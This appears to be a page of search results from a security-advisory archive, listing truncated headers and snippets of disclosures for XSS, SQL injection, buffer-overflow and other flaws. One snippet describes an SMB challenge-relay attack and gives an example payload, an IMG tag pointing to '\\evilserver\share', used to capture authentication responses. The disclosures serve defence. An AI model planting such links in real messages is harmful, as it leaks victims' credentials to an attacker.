Next Page >>
multiplication
Application: IBM WebSphere Application Server
Versions Affected: 7.0 and 6.1
Vendor URL: http://www.ibm.com/websphere/
Bug: Multiple XSS Vulnerabilities
Exploits: YES
Reported: 01.11.2008
Vendor response: 02.11.2008
Solution: FP 6.1.0.23 and 7.0.0.3
Date of Public Advisory: 27.03.2009
iScripts SocialWare 2.2.x Multiple Remote Vulnerability
Name iScripts SocialWare
Vendor http://www.iscripts.com
Versions Affected 2.2.x
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-03-07
Vtiger CRM 5.0.4 Multiple Vulnerabilities
Name Multiple Vulnerabilities in Vtiger CRM
Systems Affected Vtiger CRM 5.0.4 and possibly earlier versions
Severity Medium
Impact (CVSSv2) Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Vendor http://www.vtigercrm.com
Advisory
http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Sun JDK/JRE: Multiple vulnerabilities
Date: April 17, 2008
Bugs: #178851, #178962, #183580, #185256, #194711, #212425
ID: 200804-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Application: Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: http://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response: 28.01.2008
Patch released: 12.02.2008
Date of Public Advisory: 19.02.2008
- -----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2009-0016
Synopsis: VMware vCenter and ESX update release and vMA patch
release address multiple security issue in third
party components
Issue date: 2009-11-20
Updated on: 2009-11-20 (initial release of advisory)
CVE numbers: --- JRE ---
CVE-2009-1093 CVE-2009-1094 CVE-2009-1095
Family Connections <= 2.1.3 Multiple Remote Vulnerabilities
Name Family Connections
Vendor http://www.familycms.com
Versions Affected <= 2.1.3
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-12-16
Dear bugtraq,
Below is a digest of vulnerabilities in multiple CAPTCHA systems. All
vulnerabilities were reported by MustLive (websecurity.com.ua) during
"The Month of Bugs in CAPTCHA"
1. Peter’s Custom Anti-Spam Image < 2.9 (Wordpress plugin)
1.1 "antiselect" value can be guessed with 10% probability.
1.2 Same check pairs may be used for multiple postings
Description
***********
Blogcms system has multiple security vulnerabilities:
1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS
attackers to cause denial of service and possibly to execute arbitrary
code by using a crafted PDF file (CVE-2009-0196).
Multiple integer overflows in JasPer 1.900.1 might allow
context-dependent attackers to have an unknown impact via a crafted
image file, related to integer multiplication for memory allocation
(CVE-2008-3520).
Buffer overflow in the jas_stream_printf function in
libjasper/base/jas_stream.c in JasPer 1.900.1 might allow
context-dependent attackers to have an unknown impact via
The Common Vulnerabilities and Exposures project identifies the
following problems:
CVE-2007-1667
Multiple integer overflows in XInitImage function in xwd.c for
GraphicsMagick, allow user-assisted remote attackers to cause a
denial of service (crash) or obtain sensitive information via
crafted images with large or negative values that trigger a
buffer overflow. It only affects the oldstable distribution (etch).
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted
TCP Sequence Vulnerability
Advisory ID: cisco-sa-20090325-tcp
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
zero factor problem
-------------------
When you have a look on the code generated by the compiler you will
see that it first multiplies the timestamp, process identifier and
the numerical factor. This is performed in modular integer arithmetic.
It was therefore evaluated how likely it is that the multiplication
will result in a zero, because then the seed will be zero, too.
(on older PHP versions the seed will be 1 for mt_rand() because the
lowest bit will be forced to be 1)
1000000 is a number with its lowest 6 bits set to zero. Therefore
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Python: Multiple vulnerabilities
Date: July 31, 2008
Bugs: #230640, #232137
ID: 200807-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
############################################################################
#####
Subject: DNS Multiple Race Exploiting Tool release
Homepage: http://www.securebits.org/dnsmre.html
Download: http://www.securebits.org/tools/dns_mre-v1.0.tar.gz
OS: The tool runs on Linux
Target OS: Tested against windows 2003 server
############################################################################
#####
Application: Quate CMS
Versions Affected: 0.3.4
Vendor URL: http://www.quate.net/
Bugs: RFI, Multiple LFI, Directory traversal, Multiple XSS
Exploits: YES
Reported: 18.03.2008
Second report: 25.03.2008
Vendor response: NONE
Solution: NONE
Multiple Vulnerabilities In .FLAC File Format and Various Media
Applications
Release Date:
November 15, 2007
Date Reported:
September 28, 2007 (Vendor Reporting Coordination Began With US-CERT)
Severity:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: PCRE: Multiple vulnerabilities
Date: November 20, 2007
Bugs: #198198
ID: 200711-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Secure Network - Security Research Advisory
Vuln name: Simple PHP Blog Multiple Vulnerabilities
Systems affected: simplePHPBlog 0.5.0.1, simplePHPBlog 0.4.8 and all previous versions
Systems not affected: -
Severity: Medium
Local/Remote: Remote
Vendor URL: http://www.simplephpblog.com/
Author(s): Luca "ikki" Carettoni - luca.carettoni@securenetwork.it, Luca "Daath" De Fulgentis - daath@webapptest.org
Vendor disclosure: 14th September 2007
netVigilance Security Advisory #64
SimpGB version 1.46.02 Multiple Path Disclosure Vulnerabilities
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received
netVigilance Security Advisory #67
SimpGB version 1.46.02 Multiple XSS Attack Vulnerabilities
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received
BUGTRAQ/BID:
Title: [CAID 35690, 35691, 35692]: CA BrightStor Hierarchical
Storage Manager CsAgent Multiple Vulnerabilities
CA Vuln ID (CAID): 35690, 35691, 35692
CA Advisory Date: 2007-09-26
Reported By: Sean Larsson, iDefense Labs
anonymous researcher working with the iDefense VCP
From: Alex Legler [mailto:a3li@gentoo.org]
Sent: 02 June 2010 22:18
To: gentoo-announce@gentoo.org
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk;
security-alerts@linuxsecurity.com
Subject: [ GLSA 201006-13 ] Smarty: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201006-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability
Name iScripts MultiCart
Vendor http://www.iscripts.com
Versions Affected 2.2
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-03-07
Affected: Corporate 4.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and fixed in tetex:
Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2
and earlier allow remote attackers to cause a denial of service
(crash) via a crafted PDF file, related to (1) setBitmap and (2)
readSymbolDictSeg (CVE-2009-0146).
Affected: Corporate 4.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been found and corrected in poppler:
Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2
and earlier allow remote attackers to cause a denial of service
(crash) via a crafted PDF file, related to (1) setBitmap and (2)
readSymbolDictSeg (CVE-2009-0146).
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
web server with similar <IMG> tags. Upon receiving the connections from
system S,the attacker's SMB server will respond with the previously
obtained challenges and will store the corresponding responses returned
by the remote system. Attacker A has now a set of responses which are
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Flash Player: Multiple vulnerabilities
Date: January 03, 2010
Bugs: #296407
ID: 201001-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: OpenSSL: Multiple vulnerabilities
Date: December 01, 2009
Bugs: #270305, #280591, #292022
ID: 200912-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Next Page>>
|
